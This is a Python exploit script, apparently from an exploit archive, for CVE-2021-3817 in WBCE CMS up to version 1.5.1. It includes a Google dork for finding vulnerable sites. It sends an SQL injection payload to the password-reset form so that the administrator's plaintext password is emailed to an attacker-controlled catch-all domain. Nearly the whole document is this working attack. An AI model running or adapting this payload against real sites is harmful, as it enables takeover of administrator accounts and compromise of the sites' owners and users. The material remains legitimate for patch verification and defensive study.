00cc9f489e
3 changes to exploits/shellcodes WBCE CMS 1.5.1 - Admin Password Reset phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated) Exponent CMS 2.6 - Multiple Vulnerabilities
31 lines
No EOL
1.3 KiB
Python
Executable file
31 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
|
|
# Google Dork: intext: "Way Better Content Editing"
|
|
# Date: 20/12/2021
|
|
# Exploit Author: citril or https://github.com/maxway2021
|
|
# Vendor Homepage: https://wbce.org/
|
|
# Software Link: https://wbce.org/de/downloads/
|
|
# Version: <= 1.5.1
|
|
# Tested on: Linux
|
|
# CVE : CVE-2021-3817
|
|
# Github repo: https://github.com/WBCE/WBCE_CMS
|
|
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
|
|
|
|
import requests
|
|
|
|
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
|
|
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
|
|
|
|
headers = {
|
|
'User-Agent': 'Mozilla/5.0',
|
|
'Accept':
|
|
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
|
|
'Accept-Language': 'en-US,en;q=0.5',
|
|
'Content-Type': 'application/x-www-form-urlencoded',
|
|
'Connection': 'close'
|
|
}
|
|
|
|
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
|
|
|
|
r = requests.post(url = _url, headers = headers, data = _p)
|
|
if r.status_code == 200:
|
|
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.') |